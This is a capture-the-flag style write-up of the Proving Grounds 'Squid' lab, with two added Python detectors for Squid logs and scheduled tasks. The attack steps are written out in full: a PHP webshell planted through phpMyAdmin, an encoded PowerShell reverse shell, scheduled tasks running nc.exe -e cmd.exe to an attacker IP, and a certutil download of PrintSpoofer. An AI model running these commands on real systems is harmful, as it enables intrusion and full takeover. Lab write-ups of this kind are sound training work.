
Proving Grounds Practice - Squid

Difficulty

Easy

Scan

autorecon 192.168.212.189

OS: Windows 10, Windows Server 2019, Windows Server 2016
OS version: '10.0'
OS release: '1809'
OS build: '17763'

[*] msrpc found on tcp/135.
msrpc

[*] netbios-ssn found on tcp/139.
[*] microsoft-ds found on tcp/445.
SMB 3.0

[*] http-proxy found on tcp/3128.
squid/4.14 http-proxy
Squid-Web-Proxy-Cache[4.14]
Via-Proxy[1.1 SQUID (squid/4.14)], X-Cache[SQUID]


[*] msrpc found on tcp/49666.
[*] msrpc found on tcp/49667.

Foothold

  1. Searched for a squid 4.14 exploit; no usable exploit code was found
  2. Set the proxy to 192.168.212.189:3128, then tried to reach 192.168.212.189; no connection
  3. With the proxy set, rescanned the ports with nmap; no output at all
    export all_proxy=http://192.168.212.189:3128

    nmap -Pn -sT 192.168.212.189
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-19 23:23 CST


  4. SMB anonymous login failed; common weak passwords for administrator did not work; brute-forcing smb with hydra gave no result
    hydra -L /usr/share/wordlists/dirb/others/names.txt -P /usr/share/wordlists/rockyou.txt smb://192.168.212.189
    Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

    Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-19 21:08:23
    [INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
    [DATA] max 1 task per 1 server, overall 1 task, 123462242193 login tries (l:8607/p:14344399), ~123462242193 tries per task
    [DATA] attacking smb://192.168.212.189:445/
    [ERROR] invalid reply from target smb://192.168.212.189:445/

After several hours with no progress, I looked at the hints: information gathering does indeed have to be redone through the http-proxy.

It turns out nmap does not honour a proxy set with export. Ran information gathering again with nmap's --proxies option, still nothing; the hint says the service is on port 8080. Next time in the same situation, write a script to scan? curl --proxy http://ip:port http://ip:port

nmap -Pn -sT 192.168.212.189 -vv -p8080 --proxies http://192.168.212.189:3128
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-20 00:05 CST
Initiating Parallel DNS resolution of 1 host. at 00:05
Completed Parallel DNS resolution of 1 host. at 00:06, 2.56s elapsed
Initiating Connect Scan at 00:06
Scanning 192.168.212.189 [1 port]
Completed Connect Scan at 00:06, 2.00s elapsed (1 total ports)
Nmap scan report for 192.168.212.189
Host is up, received user-set.
Scanned at 2025-02-20 00:06:01 CST for 2s

PORT STATE SERVICE REASON
8080/tcp filtered http-proxy no-response

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 4.58 seconds
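The proxy relays requests back to a web application on the proxy host's own port 8080, which is what the rest of the foothold depends on. As an added example, not code from the original writeup: a Python check over Squid native-format access.log lines (constructed below, not captured from the lab) that flags requests whose destination is the proxy host itself, loopback, or a private range, which is how this loopback forwarding would show up to a defender. The proxy's own address is assumed to be 192.168.212.189, as in the scan.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed lines in Squid's native access.log format (not captured from the lab):
# timestamp elapsed client action/code size method URL user hierarchy/peer type
SAMPLE_LOG = """\
1740000001.101   120 192.168.45.234 TCP_MISS/200 4521 GET http://192.168.212.189:8080/phpmyadmin/ - HIER_DIRECT/192.168.212.189 text/html
1740000002.202    95 192.168.45.234 TCP_MISS/301 337 GET http://192.168.212.189:8080/adminer - HIER_DIRECT/192.168.212.189 text/html
1740000003.303    40 192.168.45.234 TCP_DENIED/403 3901 CONNECT 127.0.0.1:3306 - HIER_NONE/- text/html
1740000004.404   610 192.168.45.234 TCP_MISS/200 12034 GET http://example.org/ - HIER_DIRECT/93.184.216.34 text/html
"""

# Addresses the proxy host itself answers on (assumed for this lab; take from the host's interfaces in practice)
PROXY_SELF = {"192.168.212.189"}

def dest_host(url: str) -> str:
    """Destination host of a native-log URL field; CONNECT entries are a bare host:port."""
    if "://" not in url:
        url = "//" + url
    return (urlsplit(url).hostname or "").lower()

def is_internal(host: str) -> bool:
    """True when the destination is the proxy itself, loopback, private or link-local."""
    if host in PROXY_SELF or host == "localhost":
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # unresolved hostname: cannot judge without DNS
    return ip.is_loopback or ip.is_private or ip.is_link_local

def find_loopback_requests(log_text: str) -> list[dict]:
    """One record per request the proxy relayed towards an internal destination."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue  # malformed or truncated line
        ts, _elapsed, client, action_code, _size, method, url = fields[:7]
        host = dest_host(url)
        if is_internal(host):
            hits.append({"ts": ts, "client": client, "method": method,
                         "host": host, "status": action_code, "url": url})
    return hits

if __name__ == "__main__":
    for h in find_loopback_requests(SAMPLE_LOG):
        print(f"{h['client']} -> {h['method']} {h['url']} ({h['status']})")
```

Denied CONNECT attempts are reported as well, since a burst of them from one client is the scanning pattern described above even when the ACLs hold.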

A gobuster directory scan found three paths: phpsysinfo, adminer and phpmyadmin. With the proxy set in the browser, the entry points to these three pages are also visible directly, and there is a phpinfo as well.

gobuster dir -w /usr/share//wordlists/dirb/big.txt -u http://192.168.212.189:8080 -t 40 --proxy http://192.168.212.189:3128
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.212.189:8080
[+] Method: GET
[+] Threads: 40
[+] Wordlist: /usr/share//wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] Proxy: http://192.168.212.189:3128
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/adminer (Status: 301) [Size: 337] [--> http://192.168.212.189:8080/adminer/]
/phpmyadmin (Status: 301) [Size: 340] [--> http://192.168.212.189:8080/phpmyadmin/]
/phpsysinfo (Status: 301) [Size: 340] [--> http://192.168.212.189:8080/phpsysinfo/]
/prn (Status: 403) [Size: 292]
/secci� (Status: 403) [Size: 292]
Progress: 20469 / 20470 (100.00%)

  5. Searched for vulnerabilities in wampserver 3.2.3 and found https://www.exploit-db.com/exploits/50094; after testing, it could not be exploited.

  6. Opened http://192.168.212.189:8080/phpsysinfo/index.php?disp=bootstrap, which shows system information; the system is Windows Server 2019, which may be useful for privilege escalation later.

  7. http://192.168.212.189:8080/adminer/ is adminer version 4.7.7; searching for known vulnerabilities gave nothing; common weak passwords for the root/admin accounts did not log in; manual SQL injection checks found nothing.

  8. phpMyAdmin at http://192.168.212.189:8080/phpmyadmin/: simple SQL injection found nothing; login as user root with no password succeeded.

    First checked the user table; there was no account information related to system users.

Check the file write permission with SELECT @@secure_file_priv: an empty result means files can be written to any directory; NULL means writing is not allowed.

The next idea is to write a webshell, which first requires the server's absolute path.

The phpinfo page linked from the home page shows the current path C:/wamp/www/

Next, write the webshell and get a reverse shell

select '<?php system($_REQUEST["cmd"]); ?>' into outfile 'C:/wamp/www/r.php'
whoami shows it is system
curl --proxy http://192.168.212.189:3128 http://192.168.212.189:8080/shell11.php?cmd=whoami
nt authority\system

Reverse shell
curl --proxy http://192.168.212.189:3128 http://192.168.212.189:8080/shell11.php?cmd=powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADIAMwA0ACIALAA4ADAAOAAwACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==
nt authority\system
rlwrap nc -nvlp 8080
listening on [any] 8080 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.212.189] 50808
id
PS C:\wamp\www> whoami
nt authority\system

Escalation

In the official walkthrough, the shell obtained after the reverse shell is LOCAL SERVICE. Many OffSec PG lab machines have been updated, but the walkthroughs have not; what is certain is that they have all become easier.

The privilege escalation method is recorded as follows:

  1. Checked the privileges and found some were missing. From an article, found that LOCAL SERVICE / NETWORK SERVICE are configured with a restricted set of privileges; the full set can be obtained through a scheduled task.
PS C:\wamp\www>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\wamp\www> $TaskAction = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-Exec Bypass -Command `"C:\wamp\www\nc.exe 192.168.118.23 4444 -e cmd.exe`""

PS C:\wamp\www> Register-ScheduledTask -Action $TaskAction -TaskName "GrantPerm"

TaskPath TaskName State
-------- -------- -----
\ GrantPerm Ready

PS C:\wamp\www> Start-ScheduledTask -TaskName "GrantPerm"

Kali catches the reverse shell

Ncat: Connection from 192.168.120.223.
Ncat: Connection from 192.168.120.223:50828.
Microsoft Windows [Version 10.0.17763.2300]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ================================== ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeSystemtimePrivilege Change the system time Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled

C:\Windows\system32>
  2. At this point SeImpersonatePrivilege is still not among the privileges, but it can be obtained by creating a ScheduledTaskPrincipal whose required-privilege attribute specifies SeImpersonatePrivilege.
# Create a list of privileges
PS C:\Windows\system32> [System.String[]]$Privs = "SeAssignPrimaryTokenPrivilege", "SeAuditPrivilege", "SeChangeNotifyPrivilege", "SeCreateGlobalPrivilege", "SeImpersonatePrivilege", "SeIncreaseWorkingSetPrivilege"

# Create a Principal for the task
PS C:\Windows\system32> $TaskPrincipal = New-ScheduledTaskPrincipal -UserId "LOCALSERVICE" -LogonType ServiceAccount -RequiredPrivilege $Privs

# Create an action for the task
PS C:\Windows\system32> $TaskAction = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-Exec Bypass -Command `"C:\wamp\www\nc.exe 192.168.118.23 4444 -e cmd.exe`""

# Create the task
PS C:\Windows\system32> Register-ScheduledTask -Action $TaskAction -TaskName "GrantAllPerms" -Principal $TaskPrincipal

TaskPath TaskName State
-------- -------- -----
\ GrantAllPerms Ready

# Start the task
PS C:\Windows\system32> Start-ScheduledTask -TaskName "GrantAllPerms"

Kali listens on the new port 4444; the shell now has SeImpersonatePrivilege

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.120.223.
Ncat: Connection from 192.168.120.223:50883.
Microsoft Windows [Version 10.0.17763.2300]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

C:\Windows\system32>
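From the defender's side, the artifact of this technique is a task whose principal declares RequiredPrivileges for a service account: the definition is stored as XML under C:\Windows\System32\Tasks and is echoed in Security event 4698 (scheduled task created) when object-access auditing is enabled. As an added example, not code from the original post: a Python audit over a constructed task definition that mirrors the GrantAllPerms task above, beside an ordinary task for contrast; the namespace and the RequiredPrivileges/Privilege elements are the Task Scheduler schema's own.

```python
import xml.etree.ElementTree as ET
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Privileges that let a restricted service account regain a full token
SENSITIVE = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege", "SeDebugPrivilege", "SeTcbPrivilege"}
SERVICE_SIDS = {"S-1-5-19": "LOCAL SERVICE", "S-1-5-20": "NETWORK SERVICE"}
# Constructed task XML mirroring the GrantAllPerms task (not copied from the lab's Tasks folder)
SUSPICIOUS_TASK = """\
<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals>
    <Principal id="Author">
      <UserId>S-1-5-19</UserId>
      <RequiredPrivileges>
        <Privilege>SeAssignPrimaryTokenPrivilege</Privilege>
        <Privilege>SeChangeNotifyPrivilege</Privilege>
        <Privilege>SeImpersonatePrivilege</Privilege>
      </RequiredPrivileges>
    </Principal>
  </Principals>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-Exec Bypass -Command "C:\\wamp\\www\\nc.exe 192.168.118.23 4444 -e cmd.exe"</Arguments>
    </Exec>
  </Actions>
</Task>
"""
# Ordinary task for contrast: same service account, no RequiredPrivileges
BENIGN_TASK = """\
<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals><Principal id="Author"><UserId>S-1-5-19</UserId></Principal></Principals>
  <Actions Context="Author"><Exec><Command>cleanup.exe</Command></Exec></Actions>
</Task>
"""

def audit_task_xml(xml_text: str) -> list[dict]:
    """Return one finding per principal that declares RequiredPrivileges."""
    root = ET.fromstring(xml_text)
    commands = [" ".join(filter(None, (e.findtext("t:Command", "", NS), e.findtext("t:Arguments", "", NS))))
                for e in root.iterfind("t:Actions/t:Exec", NS)]
    findings = []
    for p in root.iterfind("t:Principals/t:Principal", NS):
        privs = [e.text.strip() for e in p.iterfind("t:RequiredPrivileges/t:Privilege", NS) if e.text]
        if not privs:
            continue  # normal task: the principal keeps its default (restricted) token
        user = p.findtext("t:UserId", "", NS).strip()
        findings.append({"principal": SERVICE_SIDS.get(user.upper(), user),
                         "sensitive": sorted(SENSITIVE & set(privs)),
                         "privileges": privs, "commands": commands})
    return findings
```

Any finding whose principal is a service account and whose sensitive list is non-empty is worth an alert on its own; the command it launches tells you what the extra token was wanted for.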

PrintSpoofer.exe can then be downloaded from https://github.com/itm4n/PrintSpoofer to escalate privileges

C:\wamp\www>certutil -urlcache -f http://192.168.118.23/PrintSpoofer64.exe PrintSpoofer64.exe
certutil -urlcache -f http://192.168.118.23/PrintSpoofer64.exe PrintSpoofer64.exe
**** Online ****
CertUtil: -URLCache command completed successfully.

# Checking SeImpersonatePrivilege abuse
C:\wamp\www>PrintSpoofer64.exe -i -c "cmd /c whoami"
PrintSpoofer64.exe -i -c "cmd /c whoami"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
nt authority\system

# Creating a new SYSTEM process in our current console
C:\wamp\www>PrintSpoofer64.exe -i -c "cmd /c cmd.exe"
PrintSpoofer64.exe -i -c "cmd /c cmd.exe"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.17763.2300]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

Reflection

  1. Still not proficient enough with the basic tools